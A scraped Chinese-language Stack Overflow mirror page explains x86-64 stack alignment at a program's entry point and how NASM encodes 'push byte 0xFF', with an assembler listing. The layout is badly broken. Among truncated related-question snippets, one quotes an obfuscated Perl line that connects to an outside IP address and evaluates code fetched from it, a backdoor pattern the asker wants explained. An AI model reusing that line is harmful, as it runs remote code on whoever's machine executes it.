- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
我在看 Intel manual关于堆栈帧。注意到
The end of the input argument area shall be aligned on a 16 (32, if
__m256
is passed on stack) byte boundary.
rsp
应该指向始终在 16 对齐的地址吗?
section .text
global _start
_start:
push byte 0xFF
;SYS_exit syscall
gdb
运行它并注意到在执行
push
之前说明
rsp = 0x7fffffffdcf0
.它确实在 16 上对齐。
x/1xg $rsp
返回
0x0000000000000001
.
rsp
的内容后变成了
0x7fffffffdce8
.是否违反对齐要求?
x/1xg $rsp
返回
0xffffffffffffffff
.这意味着我们设置了
1
到接下来的 8 个字节,而不仅仅是 push 指令中指定的一个。为什么?我预计
x/1xg $rsp
的输出推后要
0x00000000000000FF
(我们只推了一个字节)。
最佳答案
rsp
在 _start
- 这是操作系统入口点,它实际上违反了 ABI,因为堆栈应该在 call
之前对齐,因此 call
本身会加上8B的返回地址,你可以期待rsp
进入时未对齐 -8。
在应用程序进入时,请确保在调用任何其他符合 ABI 的代码之前手动对齐堆栈(或者如果您打算使用 C 运行时库,那么您的应用程序代码的入口点应该是 main
,并让 crtlib 拥有它自己的初始化代码运行在 _start
)。
Now, after pushing the content of
rsp
became0x7fffffffdce8
. Is it a violation of the alignment requirements?
call
一些更复杂的函数,例如
printf
使用非平凡参数(因此它将使用 SSE 指令进行实现),它很可能会出现段错误。
push byte 0xFF
:
byte
操作数目标大小的意义上不合法,
byte
立即数作为源值是合法的,但是
operand size can be only 16, 32 or 64 bits ),所以 NASM将猜测目标大小(任何合法的,在 64b 模式下自然选择
qword
),并将猜测的目标大小与
imm8
一起使用。从源头。
-w+all
在这种情况下使 NASM 发出(有点奇怪,但至少你可以调查)警告的选项:
warning: signed byte value exceeds bounds
push word 0xFF
只会将两个字节插入堆栈,字值
0x00FF
.
push rbp
)。
rsp
(经常使用
rbp
,所以它也起到栈帧指针的作用),然后是
and rsp,-16
清除底部位。
call
之前对齐。 ,所以它在输入时是-8B。再次简单
push rbp
通常足以同时解决多个问题,保留
rbp
值(因此
mov rbp, rsp
可以“免费”)并对齐子程序其余部分的堆栈。
push
定义是如此复杂,以至于它有点破坏了 NASM 语法(将当前语法耗尽到无法指定是操作数大小还是源立即数大小的程度,因此默默地假设大小说明符主要是操作数大小和在某些情况下会立即影响)。
push byte 0xFF
NASM 将采用
byte
部分也作为“操作数大小”,而不仅仅是直接大小。和
byte
不是推送的合法操作数大小,因此 NASM 将改为选择
qword
默认为 64b 模式。那么它也会考虑
byte
作为直接大小,并对
0xFF
进行符号扩展至
qword
. IE。这在我看来是一种未定义的行为。 NASM 创建者可能不希望您指定即时大小,因为 NASM 会针对大小进行优化,因此当您这样做时
push word -1
,它将组装为“推字操作数 imm8”。您可以以另一种方式覆盖它,以确保您通过
push strict word -1
获得 imm16 .
dword
变体实际上是
qword
操作数大小,您不能在 64b 模式下使用 32b 操作数大小):
6 00000000 6AFF push -1
7 00000002 6AFF push strict byte 0xFF
8 ****************** warning: signed byte value exceeds bounds
9 00000004 6AFF push byte 0xFF
10 ****************** warning: signed byte value exceeds bounds
11 00000006 6AFF push strict byte -1
12 00000008 6AFF push byte -1
13 0000000A 6668FF00 push strict word 0xFF
14 0000000E 6668FF00 push word 0xFF
15 00000012 6668FFFF push strict word -1
16 00000016 666AFF push word -1
17 00000019 68FF000000 push strict dword 0xFF
18 0000001E 68FF000000 push dword 0xFF
19 00000023 68FFFFFFFF push strict dword -1
20 00000028 6AFF push dword -1
21 0000002A 68FF000000 push strict qword 0xFF
22 0000002F 68FF000000 push qword 0xFF
23 00000034 68FFFFFFFF push strict qword -1
24 00000039 6AFF push qword -1
rsp -= 8
) 以尽可能短的方式立即编码,所以您只需写
push -1
并让 NASM 处理
imm8
优化本身,期待
rsp
当然要改变-8。在其他情况下,他们可能希望你知道合法的操作数大小,而不是使用
byte
根本。
imm16
而不是预期的
imm8
,我会在二进制大小上看到它并进行调查。
关于assembly - 理解堆栈对齐,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/48683962/
我试图理解 (>>=).(>>=) ,GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
关于此 Java 代码,我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
对于这个社区来说,这可能是一个愚蠢的基本问题,但如果有人能向我解释一下,我会非常满意,我对此感到非常困惑。我在网上找到了这个教程,这是一个例子。 function sports (x){
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
我有一些排序算法的集合,我想弄清楚它究竟是如何运作的。 我对一些说明有些困惑,特别是 cmp 和 jle 说明,所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
阅读 PHP.net 文档时,我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。 想改善这个问题吗?更新问题,使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心,至少有点担心!)。我仍然对那个特定问题的答案感兴
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库,但
我有以下代码,它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么?似乎只使用了“
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程,并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
我遇到了andThen ,但没有正确理解它。 为了进一步了解它,我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
这是一个代码,用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ? scala> val a = List(1,2,3) a: List[Int] = L
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果? 到目前为止,我
关闭。这个问题需要多问focused 。目前不接受答案。 想要改进此问题吗?更新问题,使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗? data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose
我是一名优秀的程序员,十分优秀!